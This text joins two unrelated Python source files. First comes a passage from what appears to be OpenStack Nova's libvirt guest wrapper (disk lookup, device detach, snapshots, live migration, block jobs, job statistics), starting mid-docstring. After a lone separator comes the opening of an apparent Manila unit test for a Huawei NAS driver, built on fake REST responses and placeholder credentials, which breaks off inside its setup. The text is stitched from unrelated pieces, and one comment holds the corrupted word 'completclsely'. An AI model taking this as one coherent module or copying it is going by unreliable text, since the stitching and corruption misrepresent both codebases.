domain (i.e. inactive XML configuration that'll be used on next
start of the domain) instead of the live domain configuration
:returns LibvirtConfigGuestDisk: mounted at device or None
"""
flags = 0
if from_persistent_config:
flags |= libvirt.VIR_DOMAIN_XML_INACTIVE
try:
doc = etree.fromstring(self._domain.XMLDesc(flags))
except Exception:
return None
# FIXME(lyarwood): Workaround for the device being either a target dev
# when called via swap_volume or source file when called via
# live_snapshot. This should be removed once both are refactored to use
# only the target dev of the device.
node = doc.find("./devices/disk/target[@dev='%s'].." % device)
if node is None:
node = doc.find("./devices/disk/source[@file='%s'].." % device)
if node is not None:
conf = vconfig.LibvirtConfigGuestDisk()
conf.parse_dom(node)
return conf
return None
def get_all_disks(self):
"""Returns all the disks for a guest
:returns: a list of LibvirtConfigGuestDisk instances
"""
return self.get_all_devices(vconfig.LibvirtConfigGuestDisk)
def get_all_devices(
self,
devtype: vconfig.LibvirtConfigGuestDevice = None,
from_persistent_config: bool = False
) -> ty.List[vconfig.LibvirtConfigGuestDevice]:
"""Returns all devices for a guest
:param devtype: a LibvirtConfigGuestDevice subclass class
:param from_persistent_config: query the device from the persistent
domain (i.e. inactive XML configuration that'll be used on next
start of the domain) instead of the live domain configuration
:returns: a list of LibvirtConfigGuestDevice instances
"""
flags = 0
if from_persistent_config:
flags |= libvirt.VIR_DOMAIN_XML_INACTIVE
try:
config = vconfig.LibvirtConfigGuest()
config.parse_str(
self._domain.XMLDesc(flags))
except Exception:
return []
devs = []
for dev in config.devices:
if (devtype is None or
isinstance(dev, devtype)):
devs.append(dev)
return devs
def detach_device(self, conf, persistent=False, live=False):
"""Detaches device to the guest.
:param conf: A LibvirtConfigObject of the device to detach
:param persistent: A bool to indicate whether the change is
persistent or not
:param live: A bool to indicate whether it affect the guest
in running state
"""
flags = persistent and libvirt.VIR_DOMAIN_AFFECT_CONFIG or 0
flags |= live and libvirt.VIR_DOMAIN_AFFECT_LIVE or 0
device_xml = conf.to_xml()
if isinstance(device_xml, bytes):
device_xml = device_xml.decode('utf-8')
LOG.debug("detach device xml: %s", device_xml)
self._domain.detachDeviceFlags(device_xml, flags=flags)
def get_xml_desc(self, dump_inactive=False, dump_sensitive=False,
dump_migratable=False):
"""Returns xml description of guest.
:param dump_inactive: Dump inactive domain information
:param dump_sensitive: Dump security sensitive information
:param dump_migratable: Dump XML suitable for migration
:returns string: XML description of the guest
"""
flags = dump_inactive and libvirt.VIR_DOMAIN_XML_INACTIVE or 0
flags |= dump_sensitive and libvirt.VIR_DOMAIN_XML_SECURE or 0
flags |= dump_migratable and libvirt.VIR_DOMAIN_XML_MIGRATABLE or 0
return self._domain.XMLDesc(flags=flags)
def save_memory_state(self):
"""Saves the domain's memory state. Requires running domain.
raises: raises libvirtError on error
"""
self._domain.managedSave(0)
def get_block_device(self, disk):
"""Returns a block device wrapper for disk."""
return BlockDevice(self, disk)
def set_user_password(self, user, new_pass):
"""Configures a new user password."""
self._domain.setUserPassword(user, new_pass, 0)
def _get_domain_info(self):
"""Returns information on Guest.
:returns list: [state, maxMem, memory, nrVirtCpu, cpuTime]
"""
return self._domain.info()
def get_info(self, host):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
:returns hardware.InstanceInfo:
"""
try:
dom_info = self._get_domain_info()
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=self.uuid)
msg = (_('Error from libvirt while getting domain info for '
'%(instance_name)s: [Error Code %(error_code)s] %(ex)s') %
{'instance_name': self.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
return hardware.InstanceInfo(
state=LIBVIRT_POWER_STATE[dom_info[0]],
internal_id=self.id)
def get_power_state(self, host):
return self.get_info(host).state
def is_active(self):
"Determines whether guest is currently running."
return self._domain.isActive()
def freeze_filesystems(self):
"""Freeze filesystems within guest."""
self._domain.fsFreeze()
def thaw_filesystems(self):
"""Thaw filesystems within guest."""
self._domain.fsThaw()
def snapshot(self, conf, no_metadata=False,
disk_only=False, reuse_ext=False, quiesce=False):
"""Creates a guest snapshot.
:param conf: libvirt.LibvirtConfigGuestSnapshotDisk
:param no_metadata: Make snapshot without remembering it
:param disk_only: Disk snapshot, no system checkpoint
:param reuse_ext: Reuse any existing external files
:param quiesce: Use QGA to quiece all mounted file systems
"""
flags = no_metadata and (
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_NO_METADATA or 0)
flags |= disk_only and (
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_DISK_ONLY or 0)
flags |= reuse_ext and (
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_REUSE_EXT or 0)
flags |= quiesce and libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_QUIESCE or 0
device_xml = conf.to_xml()
if isinstance(device_xml, bytes):
device_xml = device_xml.decode('utf-8')
self._domain.snapshotCreateXML(device_xml, flags=flags)
def shutdown(self):
"""Shutdown guest"""
self._domain.shutdown()
def pause(self):
"""Suspends an active guest
Process is frozen without further access to CPU resources and
I/O but the memory used by the domain at the hypervisor level
will stay allocated.
See method "resume()" to reactive guest.
"""
self._domain.suspend()
def migrate(self, destination, migrate_uri=None, migrate_disks=None,
destination_xml=None, flags=0, bandwidth=0):
"""Migrate guest object from its current host to the destination
:param destination: URI of host destination where guest will be migrate
:param migrate_uri: URI for invoking the migration
:param migrate_disks: List of disks to be migrated
:param destination_xml: The guest XML to be used on the target host
:param flags: May be one of more of the following:
VIR_MIGRATE_LIVE Do not pause the VM during migration
VIR_MIGRATE_PEER2PEER Direct connection between source &
destination hosts
VIR_MIGRATE_TUNNELLED Tunnel migration data over the
libvirt RPC channel
VIR_MIGRATE_PERSIST_DEST If the migration is successful,
persist the domain on the
destination host.
VIR_MIGRATE_UNDEFINE_SOURCE If the migration is successful,
undefine the domain on the
source host.
VIR_MIGRATE_NON_SHARED_INC Migration with non-shared
storage with incremental disk
copy
VIR_MIGRATE_AUTO_CONVERGE Slow down domain to make sure it does
not change its memory faster than a
hypervisor can transfer the changed
memory to the destination host
VIR_MIGRATE_POSTCOPY Tell libvirt to enable post-copy migration
VIR_MIGRATE_TLS Use QEMU-native TLS
:param bandwidth: The maximum bandwidth in MiB/s
"""
params = {}
# In migrateToURI3 these parameters are extracted from the
# `params` dict
params['bandwidth'] = bandwidth
if destination_xml:
params['destination_xml'] = destination_xml
params['persistent_xml'] = destination_xml
if migrate_disks:
params['migrate_disks'] = migrate_disks
if migrate_uri:
params['migrate_uri'] = migrate_uri
# Due to a quirk in the libvirt python bindings,
# VIR_MIGRATE_NON_SHARED_INC with an empty migrate_disks is
# interpreted as "block migrate all writable disks" rather than
# "don't block migrate any disks". This includes attached
# volumes, which will potentially corrupt data on those
# volumes. Consequently we need to explicitly unset
# VIR_MIGRATE_NON_SHARED_INC if there are no disks to be block
# migrated.
if (flags & libvirt.VIR_MIGRATE_NON_SHARED_INC != 0 and
not params.get('migrate_disks')):
flags &= ~libvirt.VIR_MIGRATE_NON_SHARED_INC
self._domain.migrateToURI3(
destination, params=params, flags=flags)
def abort_job(self):
"""Requests to abort current background job"""
self._domain.abortJob()
def migrate_configure_max_downtime(self, mstime):
"""Sets maximum time for which domain is allowed to be paused
:param mstime: Downtime in milliseconds.
"""
self._domain.migrateSetMaxDowntime(mstime)
def migrate_start_postcopy(self):
"""Switch running live migration to post-copy mode"""
self._domain.migrateStartPostCopy()
def announce_self(self):
libvirtmod_qemu.virDomainQemuMonitorCommand(
self._domain._o, 'announce_self', 1)
def get_job_info(self):
"""Get job info for the domain
Query the libvirt job info for the domain (ie progress
of migration, or snapshot operation)
:returns: a JobInfo of guest
"""
if JobInfo._have_job_stats:
try:
stats = self._domain.jobStats()
return JobInfo(**stats)
except libvirt.libvirtError as ex:
if ex.get_error_code() == libvirt.VIR_ERR_NO_SUPPORT:
# Remote libvirt doesn't support new API
LOG.debug("Missing remote virDomainGetJobStats: %s", ex)
JobInfo._have_job_stats = False
return JobInfo._get_job_stats_compat(self._domain)
elif ex.get_error_code() in (
libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
# Transient guest finished migration, so it has gone
# away completclsely
LOG.debug("Domain has shutdown/gone away: %s", ex)
return JobInfo(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job stats: %s", ex)
raise
except AttributeError as ex:
# Local python binding doesn't support new API
LOG.debug("Missing local virDomainGetJobStats: %s", ex)
JobInfo._have_job_stats = False
return JobInfo._get_job_stats_compat(self._domain)
else:
return JobInfo._get_job_stats_compat(self._domain)
class BlockDevice(object):
"""Wrapper around block device API"""
REBASE_DEFAULT_BANDWIDTH = 0 # in MiB/s - 0 unlimited
COMMIT_DEFAULT_BANDWIDTH = 0 # in MiB/s - 0 unlimited
def __init__(self, guest, disk):
self._guest = guest
self._disk = disk
def abort_job(self, async_=False, pivot=False):
"""Request to cancel a live block device job
:param async_: Cancel the block device job (e.g. 'copy' or
'commit'), and return as soon as possible, without
waiting for job completion
:param pivot: Pivot to the destination image when ending a
'copy' or "active commit" (meaning: merging the
contents of current active disk into its backing
file) job
"""
flags = async_ and libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_ASYNC or 0
flags |= pivot and libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_PIVOT or 0
self._guest._domain.blockJobAbort(self._disk, flags=flags)
def get_job_info(self):
"""Returns information about job currently running
:returns: BlockDeviceJobInfo, or None if no job exists
:raises: libvirt.libvirtError on error fetching block job info
"""
# libvirt's blockJobInfo() raises libvirt.libvirtError if there was an
# error. It returns {} if the job no longer exists, or a fully
# populated dict if the job exists.
status = self._guest._domain.blockJobInfo(self._disk, flags=0)
# The job no longer exists
if not status:
return None
return BlockDeviceJobInfo(
job=status['type'],
bandwidth=status['bandwidth'],
cur=status['cur'],
end=status['end'])
def copy(self, dest_xml, shallow=False, reuse_ext=False, transient=False):
"""Copy the guest-visible contents into a new disk
http://libvirt.org/html/libvirt-libvirt-domain.html#virDomainBlockCopy
:param: dest_xml: XML describing the destination disk to copy to
:param: shallow: Limit copy to top of source backing chain
:param: reuse_ext: Reuse existing external file for a copy
:param: transient: Don't force usage of recoverable job for the copy
operation
"""
flags = shallow and libvirt.VIR_DOMAIN_BLOCK_COPY_SHALLOW or 0
flags |= reuse_ext and libvirt.VIR_DOMAIN_BLOCK_COPY_REUSE_EXT or 0
flags |= transient and libvirt.VIR_DOMAIN_BLOCK_COPY_TRANSIENT_JOB or 0
return self._guest._domain.blockCopy(self._disk, dest_xml, flags=flags)
def rebase(self, base, shallow=False, reuse_ext=False,
copy=False, relative=False, copy_dev=False):
"""Copy data from backing chain into a new disk
This copies data from backing file(s) into overlay(s), giving
control over several aspects like what part of a disk image
chain to be copied, whether to reuse an existing destination
file, etc. And updates the backing file to the new disk
:param shallow: Limit copy to top of the source backing chain
:param reuse_ext: Reuse an existing external file that was
pre-created
:param copy: Start a copy job
:param relative: Keep backing chain referenced using relative names
:param copy_dev: Treat the destination as type="block"
"""
flags = shallow and libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW or 0
flags |= reuse_ext and libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT or 0
flags |= copy and libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY or 0
flags |= copy_dev and libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY_DEV or 0
flags |= relative and libvirt.VIR_DOMAIN_BLOCK_REBASE_RELATIVE or 0
return self._guest._domain.blockRebase(
self._disk, base, self.REBASE_DEFAULT_BANDWIDTH, flags=flags)
def commit(self, base, top, relative=False):
"""Merge data from overlays into backing file
This live merges (or "commits") contents from backing files into
overlays, thus reducing the length of a disk image chain.
:param relative: Keep backing chain referenced using relative names
"""
flags = relative and libvirt.VIR_DOMAIN_BLOCK_COMMIT_RELATIVE or 0
return self._guest._domain.blockCommit(
self._disk, base, top, self.COMMIT_DEFAULT_BANDWIDTH, flags=flags)
def resize(self, size):
"""Resize block device to the given size in bytes.
This resizes the block device within the instance to the given size.
:param size: The size to resize the device to in bytes.
"""
flags = libvirt.VIR_DOMAIN_BLOCK_RESIZE_BYTES
self._guest._domain.blockResize(self._disk, size, flags=flags)
def is_job_complete(self):
"""Return True if the job is complete, False otherwise
:returns: True if the job is complete, False otherwise
:raises: libvirt.libvirtError on error fetching block job info
"""
# NOTE(mdbooth): This method polls for block job completion. It returns
# true if either we get a status which indicates completion, or there
# is no longer a record of the job. Ideally this method and its
# callers would be rewritten to consume libvirt events from the job.
# This would provide a couple of advantages. Firstly, as it would no
# longer be polling it would notice completion immediately rather than
# at the next 0.5s check, and would also consume fewer resources.
# Secondly, with the current method we only know that 'no job'
# indicates completion. It does not necessarily indicate successful
# completion: the job could have failed, or been cancelled. When
# polling for block job info we have no way to detect this, so we
# assume success.
status = self.get_job_info()
# If the job no longer exists, it is because it has completed
# NOTE(mdbooth): See comment above: it may not have succeeded.
if status is None:
return True
# Track blockjob progress in DEBUG, helpful when reviewing failures.
job_type = LIBVIRT_BLOCK_JOB_TYPE.get(
status.job, f"Unknown to Nova ({status.job})")
LOG.debug("%(job_type)s block job progress, current cursor: %(cur)s "
"final cursor: %(end)s",
{'job_type': job_type, 'cur': status.cur, 'end': status.end})
# NOTE(lyarwood): Use the mirror element to determine if we can pivot
# to the new disk once blockjobinfo reports progress as complete.
if status.cur == status.end:
disk = self._guest.get_disk(self._disk)
if disk and disk.mirror:
return disk.mirror.ready == 'yes'
return False
def blockStats(self):
"""Extracts block device statistics for a domain"""
return self._guest._domain.blockStats(self._disk)
class VCPUInfo(object):
def __init__(self, id, cpu, state, time):
"""Structure for information about guest vcpus.
:param id: The virtual cpu number
:param cpu: The host cpu currently associated
:param state: The running state of the vcpu (0 offline, 1 running, 2
blocked on resource)
:param time: The cpu time used in nanoseconds
"""
self.id = id
self.cpu = cpu
self.state = state
self.time = time
class BlockDeviceJobInfo(object):
def __init__(self, job, bandwidth, cur, end):
"""Structure for information about running job.
:param job: The running job (0 placeholder, 1 pull,
2 copy, 3 commit, 4 active commit)
:param bandwidth: Used in MiB/s
:param cur: Indicates the position between 0 and 'end'
:param end: Indicates the position for this operation
"""
self.job = job
self.bandwidth = bandwidth
self.cur = cur
self.end = end
class JobInfo(object):
"""Information about libvirt background jobs
This class encapsulates information about libvirt
background jobs. It provides a mapping from either
the old virDomainGetJobInfo API which returned a
fixed list of fields, or the modern virDomainGetJobStats
which returns an extendable dict of fields.
"""
_have_job_stats = True
def __init__(self, **kwargs):
self.type = kwargs.get("type", libvirt.VIR_DOMAIN_JOB_NONE)
self.time_elapsed = kwargs.get("time_elapsed", 0)
self.time_remaining = kwargs.get("time_remaining", 0)
self.downtime = kwargs.get("downtime", 0)
self.setup_time = kwargs.get("setup_time", 0)
self.data_total = kwargs.get("data_total", 0)
self.data_processed = kwargs.get("data_processed", 0)
self.data_remaining = kwargs.get("data_remaining", 0)
self.memory_total = kwargs.get("memory_total", 0)
self.memory_processed = kwargs.get("memory_processed", 0)
self.memory_remaining = kwargs.get("memory_remaining", 0)
self.memory_iteration = kwargs.get("memory_iteration", 0)
self.memory_constant = kwargs.get("memory_constant", 0)
self.memory_normal = kwargs.get("memory_normal", 0)
self.memory_normal_bytes = kwargs.get("memory_normal_bytes", 0)
self.memory_bps = kwargs.get("memory_bps", 0)
self.disk_total = kwargs.get("disk_total", 0)
self.disk_processed = kwargs.get("disk_processed", 0)
self.disk_remaining = kwargs.get("disk_remaining", 0)
self.disk_bps = kwargs.get("disk_bps", 0)
self.comp_cache = kwargs.get("compression_cache", 0)
self.comp_bytes = kwargs.get("compression_bytes", 0)
self.comp_pages = kwargs.get("compression_pages", 0)
self.comp_cache_misses = kwargs.get("compression_cache_misses", 0)
self.comp_overflow = kwargs.get("compression_overflow", 0)
@classmethod
def _get_job_stats_compat(cls, dom):
# Make the old virDomainGetJobInfo method look similar to the
# modern virDomainGetJobStats method
try:
info = dom.jobInfo()
except libvirt.libvirtError as ex:
# When migration of a transient guest completes, the guest
# goes away so we'll see NO_DOMAIN error code
#
# When migration of a persistent guest completes, the guest
# merely shuts off, but libvirt unhelpfully raises an
# OPERATION_INVALID error code
#
# Lets pretend both of these mean success
if ex.get_error_code() in (libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job info: %s", ex)
raise
return cls(
type=info[0],
time_elapsed=info[1],
time_remaining=info[2],
data_total=info[3],
data_processed=info[4],
data_remaining=info[5],
memory_total=info[6],
memory_processed=info[7],
memory_remaining=info[8],
disk_total=info[9],
disk_processed=info[10],
disk_remaining=info[11])
|
|
# Copyright (c) 2014 Huawei Technologies Co., Ltd.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the Huawei nas driver module."""
import os
import shutil
import tempfile
import time
import xml.dom.minidom
import ddt
import mock
from oslo_serialization import jsonutils
from manila import context
from manila import exception
from manila.share import configuration as conf
from manila.share.drivers.huawei import huawei_nas
from manila.share.drivers.huawei.v3 import connection
from manila.share.drivers.huawei.v3 import helper
from manila import test
def fake_sleep(time):
pass
def data_session(url):
if url == "/xx/sessions":
data = """{"error":{"code":0},
"data":{"username":"admin",
"iBaseToken":"2001031430",
"deviceid":"210235G7J20000000000"}}"""
if url == "sessions":
data = '{"error":{"code":0},"data":{"ID":11}}'
return data
def filesystem(method, data, fs_status_flag):
extend_share_flag = False
if method == "PUT":
if data == """{"CAPACITY": 8388608}""":
data = """{"error":{"code":0},
"data":{"ID":"4",
"CAPACITY":"8388608"}}"""
extend_share_flag = True
elif method == "DELETE":
data = """{"error":{"code":0}}"""
elif method == "GET":
if fs_status_flag:
data = """{"error":{"code":0},
"data":{"HEALTHSTATUS":"1",
"RUNNINGSTATUS":"27",
"PARENTNAME":"OpenStack_Pool"}}"""
else:
data = """{"error":{"code":0},
"data":{"HEALTHSTATUS":"0",
"RUNNINGSTATUS":"27",
"PARENTNAME":"OpenStack_Pool"}}"""
else:
data = '{"error":{"code":31755596}}'
return (data, extend_share_flag)
def allow_access(type, method, data):
allow_ro_flag = False
allow_rw_flag = False
access_nfs = {
"TYPE": "16409",
"NAME": "1.2.3.4",
"PARENTID": "1",
"ACCESSVAL": "0",
"SYNC": "0",
"ALLSQUASH": "1",
"ROOTSQUASH": "0",
}
access_nfs_ro_data = jsonutils.dumps(access_nfs)
access_nfs["NAME"] = "100.112.0.1"
access_nfs["ACCESSVAL"] = "1"
access_nfs_rw_data = jsonutils.dumps(access_nfs)
access_cifs = {
"NAME": "user_name",
"PARENTID": "2",
"PERMISSION": "0",
"DOMAINTYPE": "2",
}
access_cifs_ro_data = jsonutils.dumps(access_cifs)
access_cifs["PERMISSION"] = "5"
access_cifs_rw_data = jsonutils.dumps(access_cifs)
if method != "POST":
data = """{"error":{"code":31755596}}"""
return data
if ((data == access_nfs_ro_data and type == "NFS")
or (data == access_cifs_ro_data and type == "CIFS")):
allow_ro_flag = True
data = """{"error":{"code":0}}"""
elif ((data == access_nfs_rw_data and type == 'NFS')
or (data == access_cifs_rw_data and type == 'CIFS')):
allow_rw_flag = True
data = """{"error":{"code":0}}"""
else:
data = """{"error":{"code":31755596}}"""
return (data, allow_ro_flag, allow_rw_flag)
class FakeHuaweiNasHelper(helper.RestHelper):
def __init__(self, *args, **kwargs):
helper.RestHelper.__init__(self, *args, **kwargs)
self.test_normal = True
self.deviceid = None
self.delete_flag = False
self.allow_flag = False
self.deny_flag = False
self.create_snapflag = False
self.setupserver_flag = False
self.fs_status_flag = True
self.create_share_flag = False
self.snapshot_flag = True
self.service_status_flag = True
self.share_exist = True
self.service_nfs_status_flag = True
self.create_share_data_flag = False
self.allow_ro_flag = False
self.allow_rw_flag = False
self.extend_share_flag = False
self.test_multi_url_flag = 0
def _change_file_mode(self, filepath):
pass
def do_call(self, url, data=None, method=None):
url = url.replace('http://100.115.10.69:8082/deviceManager/rest', '')
url = url.replace('/210235G7J20000000000/', '')
if self.test_normal:
if self.test_multi_url_flag == 1:
data = '{"error":{"code":-403}}'
res_json = jsonutils.loads(data)
return res_json
elif self.test_multi_url_flag == 2:
if 'http://100.115.10.70:8082/deviceManager/rest' in url:
url = url.replace('http://100.115.10.70:8082/'
'deviceManager/rest', '')
else:
data = '{"error":{"code":-403}}'
res_json = jsonutils.loads(data)
return res_json
if url == "/xx/sessions" or url == "sessions":
data = data_session(url)
if url == "storagepool":
data = """{"error":{"code":0},
"data":[{"USERFREECAPACITY":"2097152",
"ID":"1",
"NAME":"OpenStack_Pool",
"USERTOTALCAPACITY":"4194304",
"USAGETYPE":"2",
"USERCONSUMEDCAPACITY":"2097152"}]}"""
if url == "filesystem":
data = """{"error":{"code":0},"data":{
"ID":"4"}}"""
if url == "NFSHARE" or url == "CIFSHARE":
if self.create_share_flag:
data = '{"error":{"code":31755596}}'
elif self.create_share_data_flag:
data = '{"error":{"code":0}}'
else:
data = """{"error":{"code":0},"data":{
"ID":"10"}}"""
if url == "NFSHARE?range=[100-200]":
if self.share_exist:
data = """{"error":{"code":0},
"data":[{"ID":"1",
"FSID":"4",
"NAME":"test",
"SHAREPATH":"/share_fake_uuid/"}]}"""
else:
data = """{"error":{"code":0},
"data":[{"ID":"1",
"FSID":"",
"NAME":"test",
"SHAREPATH":"/share_fake_uuid_fail/"}]}"""
if url == "CIFSHARE?range=[100-200]":
data = """{"error":{"code":0},
"data":[{"ID":"2",
"FSID":"4",
"NAME":"test",
"SHAREPATH":"/share_fake_uuid/"}]}"""
if url == "NFSHARE?range=[0-100]":
data = """{"error":{"code":0},
"data":[{"ID":"1",
"FSID":"4",
"NAME":"test_fail",
"SHAREPATH":"/share_fake_uuid_fail/"}]}"""
if url == "CIFSHARE?range=[0-100]":
data = """{"error":{"code":0},
"data":[{"ID":"2",
"FSID":"4",
"NAME":"test_fail",
"SHAREPATH":"/share_fake_uuid_fail/"}]}"""
if url == "NFSHARE/1" or url == "CIFSHARE/2":
data = """{"error":{"code":0}}"""
self.delete_flag = True
if url == "FSSNAPSHOT":
data = """{"error":{"code":0},"data":{
"ID":"3"}}"""
self.create_snapflag = True
if url == "FSSNAPSHOT/4@share_snapshot_fake_snapshot_uuid":
if self.snapshot_flag:
data = """{"error":{"code":0},"data":{"ID":"3"}}"""
else:
data = '{"error":{"code":1073754118}}'
self.delete_flag = True
if url == "FSSNAPSHOT/3":
data = """{"error":{"code":0}}"""
self.delete_flag = True
if url == "NFS_SHARE_AUTH_CLIENT":
data, self.allow_ro_flag, self.allow_rw_flag = \
allow_access('NFS', method, data)
self.allow_flag = True
if url == "CIFS_SHARE_AUTH_CLIENT":
data, self.allow_ro_flag, self.allow_rw_flag = \
allow_access('CIFS', method, data)
self.allow_flag = True
if url == "FSSNAPSHOT?TYPE=48&PARENTID=4"\
"&&sortby=TIMESTAMP,d&range=[0-2000]":
data = """{"error":{"code":0},
"data":[{"ID":"3",
"NAME":"share_snapshot_fake_snapshot_uuid"}]}"""
self.delete_flag = True
if url == "NFS_SHARE_AUTH_CLIENT?"\
"filter=PARENTID::1&range=[0-100]":
data = """{"error":{"code":0},
"data":[{"ID":"0",
"NAME":"100.112.0.1_fail"}]}"""
if url == "CIFS_SHARE_AUTH_CLIENT?"\
"filter=PARENTID::2&range=[0-100]":
data = """{"error":{"code":0},
"data":[{"ID":"0",
"NAME":"user_name_fail"}]}"""
if url == "NFS_SHARE_AUTH_CLIENT?"\
"filter=PARENTID::1&range=[100-200]":
data = """{"error":{"code":0},
"data":[{"ID":"5",
"NAME":"100.112.0.1"}]}"""
if url == "CIFS_SHARE_AUTH_CLIENT?"\
"filter=PARENTID::2&range=[100-200]":
data = """{"error":{"code":0},
"data":[{"ID":"6",
"NAME":"user_name"}]}"""
if url == "NFS_SHARE_AUTH_CLIENT/5"\
or url == "CIFS_SHARE_AUTH_CLIENT/6":
data = """{"error":{"code":0}}"""
self.deny_flag = True
if url == "NFSHARE/count" or url == "CIFSHARE/count":
data = """{"error":{"code":0},"data":{
"COUNT":"196"}}"""
if url == "NFS_SHARE_AUTH_CLIENT/count?filter=PARENTID::1"\
or url == "CIFS_SHARE_AUTH_CLIENT/count?filter="\
"PARENTID::2":
data = """{"error":{"code":0},"data":{
"COUNT":"196"}}"""
if url == "CIFSSERVICE":
if self.service_status_flag:
data = """{"error":{"code":0},"data":{
"RUNNINGSTATUS":"2"}}"""
else:
data = """{"error":{"code":0},"data":{
"RUNNINGSTATUS":"1"}}"""
if url == "NFSSERVICE":
if self.service_nfs_status_flag:
data = """{"error":{"code":0},
"data":{"RUNNINGSTATUS":"2",
"SUPPORTV3":"true",
"SUPPORTV4":"true"}}"""
else:
data = """{"error":{"code":0},
"data":{"RUNNINGSTATUS":"1",
"SUPPORTV3":"true",
"SUPPORTV4":"true"}}"""
self.setupserver_flag = True
if url == "FILESYSTEM?range=[0-8191]":
data = """{"error":{"code":0},
"data":[{"ID":"4",
"NAME":"share_fake_uuid"}]}"""
if url == "filesystem/4":
data, self.extend_share_flag = filesystem(method, data,
self.fs_status_flag)
self.delete_flag = True
else:
data = '{"error":{"code":31755596}}'
res_json = jsonutils.loads(data)
return res_json
class FakeHuaweiNasDriver(huawei_nas.HuaweiNasDriver):
"""Fake HuaweiNasDriver."""
def __init__(self, *args, **kwargs):
huawei_nas.HuaweiNasDriver.__init__(self, *args, **kwargs)
self.plugin = FakeV3StorageConnection(self.configuration)
class FakeV3StorageConnection(connection.V3StorageConnection):
"""Fake V3StorageConnection."""
def __init__(self, configuration):
connection.V3StorageConnection.__init__(self, configuration)
self.configuration = configuration
self.helper = FakeHuaweiNasHelper(self.configuration)
@ddt.ddt
class HuaweiShareDriverTestCase(test.TestCase):
"""Tests GenericShareDriver."""
def setUp(self):
super(HuaweiShareDriverTestCase, self).setUp()
self._context = context.get_admin_context()
self.tmp_dir = tempfile.mkdtemp()
self.fake_conf_file = self.tmp_dir + '/manila_huawei_conf.xml'
self.addCleanup(shutil.rmtree, self.tmp_dir)
self.create_fake_conf_file(self.fake_conf_file)
self.addCleanup(os.remove, self.fake_conf_file)
def _safe_get(opt):
return getattr(self.configuration, opt)
self.configuration = mock.Mock(spec=conf.Configuration)
self.configuration.safe_get = mock.Mock(side_effect=_safe_get)
self.configuration.network_config_group = 'fake_network_config_group'
self.configuration.share_backend_name = 'fake_share_backend_name'
self.configuration.huawei_share_backend = 'V3'
self.configuration.manila_huawei_conf_file = self.fake_conf_file
self.configuration.driver_handles_share_servers = False
self._helper_fake = mock.Mock()
self.mock_object(huawei_nas.importutils, 'import_object',
mock.Mock(return_value=self._helper_fake))
self.mock_object(time, 'sleep', fake_sleep)
self.driver = FakeHuaweiNasDriver(configuration=self.configuration)
self.driver.plugin.helper.test_normal = True
self.share_nfs = {
'id': 'fake_uuid',
'project_id': 'fake_tenant_id',
'display_name': 'fake',
'name': 'share-fake-uuid',
'size': 1,
'share_proto': 'NFS',
'share_network_id': 'fake_net_id',
'share_server_id': 'fake-share-srv-id',
'host': 'fake_host@fake_backend#OpenStack_Pool',
}
self.share_proto_fail = {
'id': 'fake_uuid',
'project_id': 'fake_tenant_id',
'display_name': 'fake',
'name': 'share-fake-uuid',
'size': 1,
'share_proto': 'proto_fail',
'share_network_id': 'fake_net_id',
'share_server_id': 'fake-share-srv-id',
'host': 'fake_host@fake_backend#OpenStack_Pool',
}
self.share_cifs = {
'id': 'fake_uuid',
'project_id': 'fake_tenant_id',
'display_name': 'fake',
'name': 'share-fake-uuid',
'size': 1,
'share_proto': 'CIFS',
'share_network_id': 'fake_net_id',
'share_server_id': 'fake-share-srv-id',
'host': 'fake_host@fake_backend#OpenStack_Pool',
}
self.nfs_snapshot = {
'id': 'fake_snapshot_uuid',
'share_name': 'share_fake_uuid',
'share_id': 'fake_uuid',
'display_name': 'snapshot',
'name': 'fake_snapshot_name',
'share_size': 1,
'size': 1,
'share_proto': 'NFS',
}
self.cifs_snapshot = {
'id': 'fake_snapshot_uuid',
'share_name': 'share_fake_uuid',
'share_id': 'fake_uuid',
'display_name': 'snapshot',
'name': 'fake_snapshot_name',
'share_size': 1,
'size': 1,
'share_proto': 'CIFS',
}
self.security_service = {
'id': 'fake_id',
'domain': 'FAKE',
'server': 'fake_server',
'user': 'fake_user',
'password': 'fake_password',
}
self.access_ip = {
'access_type': 'ip',
'access_to': '100.112.0.1',
'access_level': 'rw',
}
self.access_user = {
'access_type': 'user',
'access_to': 'user_name',
'access_level': 'rw',
}
self.share_server = None
self.driver._licenses = ['fake']
self.network_info = {
'server_id': 'fake_server_id',
'cidr': '10.0.0.0/24',
'security_services': ['fake_ldap', 'fake_kerberos', 'fake_ad', ],
'segmentation_id': '1000',
'network_allocations': [
{'id': 'fake_na_id_1', 'ip_address': 'fake_ip_1', },
{'id': 'fake_na_id_2', 'ip_address': 'fake_ip_2', },
],
}
self.share_nfs_host_not_exist = {
'id': 'fake_uuid',
'project_id': 'fake_tenant_id',
'display_name': 'fake',
'name': 'share-fake-uuid',
'size': 1,
'share_proto': 'NFS',
'share_network_id': 'fake_net_id',
'share_server_id': 'fake-share-srv-id',
'host': 'fake_host@fake_backend#',
}
